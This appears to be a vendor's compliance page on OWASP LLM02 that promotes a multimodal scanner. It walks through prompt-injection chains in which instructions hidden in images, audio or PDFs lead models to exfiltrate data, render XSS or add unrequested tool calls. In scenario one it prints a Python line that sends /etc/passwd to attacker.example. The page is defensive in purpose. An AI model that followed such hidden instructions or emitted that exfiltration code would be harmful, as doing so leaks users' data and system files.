Compliance · OWASP LLM02:2025

OWASP LLM02:2025 Insecure Output Handling — the multimodal-origin attack chain

The standard OWASP LLM02:2025 (Insecure Output Handling) playbook begins with a user typing a malicious prompt. In a multimodal application, the prompt never has to be typed: an instruction hidden in an uploaded image or audio file reaches the vision or audio model, the model's output becomes the attack payload, and that payload flows into a downstream code interpreter, web renderer, or database without the output sanitizer ever seeing the root cause. This is the LLM01→LLM02 chain. An output-only control catches some harm at the end of the chain, but it cannot break the chain at the start. Here is what LLM02:2025 names, where multimodal inputs create LLM02 exposure that a text-only program misses, and the two-control architecture — input inspection and output sanitization — that closes both risks together.

TL;DR

LLM02:2025 (canonical risk page at the OWASP GenAI Security Project) covers the class of vulnerabilities where LLM-generated output is consumed by a downstream component — a code interpreter, a web renderer, an API, a shell — without sanitization or validation. In multimodal apps, the payload that reaches the downstream component can originate in an image or audio file rather than a typed prompt. A text-only output sanitizer sees the same poisoned code or markup either way; it does not know the taint came from pixels. Breaking the chain before the poisoned output is generated — by scanning the image or audio bytes before they reach the model — is the structural answer. Glyphward is the inference-time multimodal scanner that sits at that boundary and blocks the tainted input so no poisoned output is ever produced for a downstream component to execute.

What LLM02:2025 actually covers

LLM02:2025 takes its name from the class of downstream-execution vulnerabilities that exist when an application passes LLM output to another system without treating that output as untrusted. The 2025 revision of the OWASP Top 10 for LLM Applications identifies several categories of downstream harm:

The 2025 list names these scenarios because code-interpreter agents, agentic pipelines that render LLM output in web views, and structured-output-to-API patterns are now mainstream in production AI applications. The control the list calls for is sanitization and validation of every LLM output before it reaches a downstream executor — not trust that the model's output is safe because the model's input was user-supplied text.

Where multimodal inputs create LLM02 exposure

The standard LLM02 framing assumes the attack begins at the text input boundary: a user or an external source crafts a prompt that steers the model into producing harmful output. In multimodal applications, that assumption is wrong. The attack can begin at the image or audio boundary instead.

The chain works in two stages. Stage one is LLM01 multimodal: an instruction is hidden inside image pixels or an audio waveform — a FigStep-style adversarial-glyph overlay, an AgentTypo confusable-character block, a WhisperInject ultrasonic carrier, or an indirect image injected through a retrieved document (see FigStep detection, AgentTypo detector, WhisperInject detection, indirect prompt injection in images). The vision or audio model reads those bytes as part of the context and follows the embedded instruction. Stage two is LLM02: the model's output — now shaped by the injected instruction — flows to a downstream component that executes it. The downstream component is not the model; it is the code interpreter, the markdown renderer, the structured-output parser, or the API adapter downstream of the model.

What makes this chain dangerous for a standard LLM02 control program is that the output sanitizer observes the same output regardless of whether the taint came from a typed user prompt or from pixels in an uploaded image. The output sanitizer cannot close the chain at its root. It can catch some terminal harm — rejecting a generated rm -rf command before the shell runs it, stripping a <script> tag before the browser renders it — but it cannot prevent the model from having generated the payload in the first place. The only structural closure is at stage one: scan the image or audio bytes before they reach the model, so no poisoned output is ever produced for the downstream component to process.

Four multimodal-origin LLM02 attack scenarios

Four attack patterns recur in the multimodal LLM02 threat model across production application categories.

1. Code-interpreter agent with image input. The application lets users upload screenshots or charts for analysis; the model reads the image and then generates Python the code interpreter runs. A FigStep-style overlay on the uploaded image instructs the model to include a data-exfiltration line in its generated code — import urllib; urllib.request.urlopen('https://attacker.example/?' + open('/etc/passwd').read()). The user's visible output is a normal-looking analysis; the exfiltration runs silently in the REPL. An output sanitizer that validates generated Python can catch this specific form if it pattern-matches the exfiltration URL or the system-file path. But the model can generate an equivalent payload in a thousand syntactic variations, making signature-based output filtering an arms-race. Closing stage one — rejecting the FigStep-bearing image before it reaches the model — prevents the tainted Python from being generated at all. Per-product threat model in screenshot-reading agents, CrewAI agents, and AutoGen agents.

2. Multimodal chatbot with markdown rendering. The application renders LLM output as HTML in a chat interface. Users can upload images in conversation. An adversarial image instructs the model to output a markdown link that, when rendered, loads an attacker-controlled resource or triggers a JavaScript handler. Classic stored-XSS impact — session token theft, CSRF, UI redirection — delivered through the vision channel. An output sanitizer that strips <script> tags and enforces a content-security policy catches the terminal step for most delivery forms. But a sandboxed rendering environment plus output sanitization is a significantly more complex control to maintain than scanning the image at upload time. Per-product threat model in chatbots with image upload.

3. RAG pipeline with image-bearing PDFs. A document retrieval pipeline ingests PDFs and passes retrieved chunks to the model. A PDF with an embedded image carries a FigStep or indirect-injection payload — an instruction to include a specific URL in the model's synthesized answer, or to populate a structured-output field with an attacker-specified value. If the model's answer feeds a downstream API call or a database write, the injected field value executes with the application's permissions. An output sanitizer on the API call can validate schema conformance; but the schema is wide enough to admit a privilege-escalating value (a role override, a quota increase, an admin flag). Stage-one closure — scanning images extracted from PDFs at ingestion or retrieval time — prevents the poisoned chunk from ever reaching the model. Per-product threat model in RAG pipelines.

4. Voice agent with code generation or tool dispatch. The application transcribes audio, passes the transcript to an LLM, and uses the model's response to dispatch tool calls or generate configuration. A WhisperInject-class payload in the audio instructs the model to add a tool call not requested by the user — a calendar write to an attacker-controlled time slot, an API call to an exfiltration endpoint, a configuration change that persists across sessions. The transcript that reaches the text-side guard is clean (Whisper dropped the carrier); the model's output contains the injected tool call. Per-product threat model in voice agents; byte-level coverage in audio prompt-injection detection.

Why text output filters do not close the multimodal-origin chain

Three architectural facts explain why output sanitization is necessary but not sufficient for multimodal-origin LLM02.

Position in the pipeline. An output sanitizer sits after the model. It processes the model's response before a downstream component executes it. That position is correct and useful — it is the last line of defence before real harm occurs. But it cannot see why the model produced that particular output. A rm -rf command in generated code looks identical whether the model was steered there by a typed jailbreak, a FigStep overlay in an uploaded image, or an indirect injection in a retrieved PDF. The sanitizer treats all three the same. It catches the terminal form of the attack but cannot prevent the model from generating the next syntactic variant.

The OCR adapter problem. One mitigation for image inputs is to run OCR on every uploaded image and pass the OCR output through the text-side output sanitizer as if it were a text input. This does not close the multimodal-origin LLM02 chain for the same reason it does not close LLM01 multimodal: FigStep, AgentTypo, and the adversarial-glyph class are specifically designed to survive OCR. The pixels contain an instruction the vision model reads; the OCR transcript does not contain that instruction; the text-side filter sees nothing suspicious. See why every text-only scanner misses a 30-pixel PNG for the full architectural argument. The same structural ceiling applies when the OCR adapter is feeding an output filter rather than an input filter.

Indirect vectors skip text inspection entirely. In a RAG pipeline or an MCP-connected agent, the image or audio bytes arrive through a retrieval, a tool result, or an embedded resource — not through a direct user upload. The user's initial message may be benign and entirely clean on both text-side input and output filters. The taint enters through the non-text channel (see MCP servers and RAG pipelines). Neither the text-side input filter nor the text-side output filter has a chance to observe the payload before it reaches the model.

Coverage matrix — LLM02 multimodal evidence

For a buyer building an LLM02:2025 control program that accounts for multimodal-origin attack paths, the question is which tools address each layer. The table below separates input-side multimodal coverage (stage one — prevents poisoned output from being generated) from output-side sanitization (stage two — catches terminal harm before downstream execution).

ToolInput-side multimodal scanOutput-side text sanitizationLLM02 multimodal-origin coverage
Lakera GuardNo (text-only input guard)Yes (output scanner available)Stage 2 only — multimodal-origin chain not broken at root
LLM Guard (OSS)No (text-only by design)Yes (output scanners in OSS library)Stage 2 only — multimodal-origin chain not broken at root
Azure Prompt ShieldsImage moderation, not PIYes (Azure Content Safety output filters)Stage 2 only; image moderation ≠ PI detection on input
PromptfooEval-time test harnessEval-time test harnessNeither stage at inference time — CI/eval tool, not runtime control
GlyphwardYes — image + audio bytes, inference-timeNot in scope (pair with text-side output filter)Stage 1 — breaks the chain before poisoned output is generated

The operative takeaway is that Glyphward and a text-side output sanitizer are complements, not substitutes. LLM02 needs both: the multimodal input scanner closes the root-cause path, and the output sanitizer catches any residual harm that reaches the downstream boundary — whether from text-side injection or from a multimodal-origin payload that evaded the input scanner (e.g., a novel attack class not yet in the corpus). No single tool closes both stages unilaterally. The comparison detail is in Glyphward vs Lakera Guard, vs LLM Guard, vs Azure Prompt Shields, and vs Promptfoo.

The two-control architecture for LLM01+LLM02 compliance

Closing LLM02:2025 in a multimodal application requires two controls positioned at two different pipeline boundaries. Neither replaces the other; they address different stages of the same attack chain.

  1. Stage-one: multimodal input inspection. Place the scanner on every boundary at which image or audio bytes enter the model's context — the upload handler before the vision API call, the audio buffer before the STT pipeline, the loader middleware before RAG ingestion, the tool-result handler before MCP content blocks reach the LLM host. Score each byte payload against the PI detection corpus. Reject or quarantine payloads above the threshold before they reach the model. This prevents any poisoned output from being generated; there is nothing for a downstream executor to receive. Per-framework mount points in LangChain, CrewAI, AutoGen, OpenAI Assistants API, RAG pipelines, and MCP servers.
  2. Stage-two: output sanitization before downstream execution. Validate and sanitize every LLM output before passing it to a code interpreter, a web renderer, an API client, or a data store. This is the standard LLM02 control: treat the model's response as untrusted user input at every downstream boundary. For code execution, run the generated code through a static analyser or execute in a sandboxed environment with no network or filesystem access. For web rendering, enforce a strict CSP and strip all raw HTML from markdown output. For structured-output-to-API flows, validate the output against a tight schema that rejects unexpected fields and values. For database writes, use parameterised queries regardless of the LLM output's apparent structure.
  3. Source-aware trust thresholds. Apply lower scan thresholds for content that arrives from less-trusted sources — third-party tool results, public-web retrievals, community-contributed documents. The same image byte stream from a first-party internal document warrants a different risk posture than the same bytes arriving from an untrusted URL in an MCP server's tool response. Source-aware thresholds let the control program express this risk tier without blocking first-party content unnecessarily.
  4. Per-request scoring for evidence. Both controls should produce per-request evidence: the multimodal scanner returns a request ID and a 0–100 score; the output sanitizer logs every rejection and the downstream component it protected. LLM02:2025 audit evidence is a claim about pipeline integrity across all execution paths — not just the happy path — and per-request logs are the only way to demonstrate coverage at scale. The OWASP LLM01 and LLM02 evidence questions are typically asked together in an audit; the combined log answers both from a single evidence trail.
  5. Ongoing testing. Add multimodal PI payloads to your CI eval suite (see Promptfoo + multimodal scanning). A red-team run against each modality the application accepts — direct image upload, audio input, and every indirect channel — verifies that the stage-one scanner is catching the current corpus and that the stage-two sanitizer is rejecting the outputs it produces when the scanner is disabled. Running both stages in isolation and together gives you four test configurations; the failure modes of each combination map directly onto the OWASP LLM02 evidence question structure.

How Glyphward closes stage one

Glyphward is the inference-time multimodal scanner — bytes in, 0–100 score and flagged region out — that sits at the stage-one boundary described above. The HTTP contract is one POST per attachment: image bytes or URL, or audio bytes; the response is a score, the flagged region (bounding box for images, time window for audio), the modality-tagged reason, and a request ID. The scanner runs CLIP embedding plus a typographic-PI detection head plus Tesseract OCR cross-referenced against a curated payload corpus on the image side, and a waveform anomaly classifier plus Whisper-small transcript filter on the audio side. Full architecture in the multimodal prompt-injection threat model for AI product teams (2026).

For an LLM02:2025 audit the scanner addresses the multimodal-origin gap: the stage-one scores, request IDs, and flagged-region reasons constitute the evidence that multimodal inputs are inspected before they reach any model that produces downstream-executed output. That evidence answers the implicit question behind every LLM02 audit item — "what controls prevent the model from generating a harmful payload from a non-text input?" — in the same way the text-side input guard answers the same question for text inputs.

Glyphward does not replace an output sanitizer — it pairs with one. The OWASP LLM01:2025 multimodal coverage page covers the input-side control in detail. The output-side control belongs to the same text-PI vendor family (Lakera, LLM Guard, Azure) most teams already use for text inputs; Glyphward is the missing half, not a replacement for the half that already exists. Pricing is flat-rate self-serve at $29/mo Pro and $99/mo Team, with a free tier for prototyping via the free-tier API.

Get early access · See the API surface

Related questions

Does LLM02:2025 explicitly name multimodal inputs as an attack vector?

The 2025 description of LLM02 focuses on downstream execution paths (code interpreters, web renderers, SQL interpreters) and the failure to sanitize LLM output before those paths execute it. The upstream attack vector — whether a user typed a prompt, uploaded an image, or supplied an audio file — is not the primary focus of the LLM02 description. That is LLM01's territory. The reason multimodal inputs appear in an LLM02 program is that LLM01 and LLM02 are two stages of the same attack chain: a multimodal LLM01 injection produces a tainted LLM output, and that tainted output is the LLM02 payload. An audit that covers both controls will ask about the multimodal-origin path through both. Covering LLM01 multimodal effectively is therefore part of a complete LLM02 program even though LLM02's own description does not name images or audio.

Can I close LLM02 just with sandboxed code execution, without a multimodal input scanner?

Sandboxing reduces the blast radius of RCE — code that executes with no network or filesystem access cannot exfiltrate secrets even if it runs. That is a valid control for the code-execution sub-category of LLM02. But it does not address XSS (rendered markdown), SSRF (URL fetching), or structured-output injection (privilege escalation through API/DB writes), which are also LLM02:2025 categories. And for all categories, sandboxing treats the symptom rather than the cause: the model still generated the injected payload, and the sandbox is a bet that every future generated payload remains within sandbox limits. Adding a multimodal input scanner at stage one is complementary: it prevents the injection before the model generates any payload, so there is nothing for the sandbox to contain.

What is the relationship between LLM02 and LLM06 (Excessive Agency)?

LLM06:2025 (Excessive Agency) covers the scenario where an LLM application has been granted more permissions, capabilities, or autonomy than the task requires — and an attacker exploits that over-provisioning to cause harm. The multimodal LLM02 chain and the LLM06 risk intersect at the code-interpreter-agent scenario: if the code executor has write access to production files or network access to internal APIs, a LLM02 injection (malicious code generated from a tainted image) causes LLM06-class harm (excessive agency enabling real damage). Closing LLM02 multimodal at stage one reduces but does not replace the need for LLM06 controls (least-privilege tool permissions, confirmation gates for irreversible actions). The two controls are independent layers, not alternatives.

How do I evidence LLM02 multimodal coverage in a SOC 2 or ISO 27001 audit?

The evidence structure is the same as for LLM01 multimodal: per-request scan IDs and scores from the input scanner plus per-request rejection logs from the output sanitizer. For an auditor asking about LLM02 in a multimodal application, the operative question is whether each downstream execution path (code, render, API, database) has a documented sanitization control, and whether the input path that feeds the model has a documented inspection control. Answer both with log samples: a scan ID from the multimodal scanner showing a flagged image was rejected before model inference, and a rejection log from the output sanitizer showing a generated code block was blocked before the REPL ran it. The two logs together cover the full chain. Glyphward's Pro and Team tiers include logging and per-request IDs suitable for this evidence trail without additional engineering.

Where does LLM02 sit relative to the other OWASP LLM compliance pages on this site?

The LLM01:2025 multimodal page covers the input-inspection control — the stage-one half of the chain described on this page. LLM01 is the upstream risk; LLM02 is the downstream risk. The EU AI Act Article 15 and NIST AI RMF GenAI Profile compliance pages (EU AI Act, NIST AI RMF, MITRE ATLAS, NIST AI 100-2) cover the same multimodal input inspection control mapped onto different vocabulary sets. An LLM02 multimodal evidence trail that references the stage-one Glyphward control can cite both the LLM01:2025 multimodal sub-category and any applicable standard vocabulary — they describe the same scanner from different audit angles.

Further reading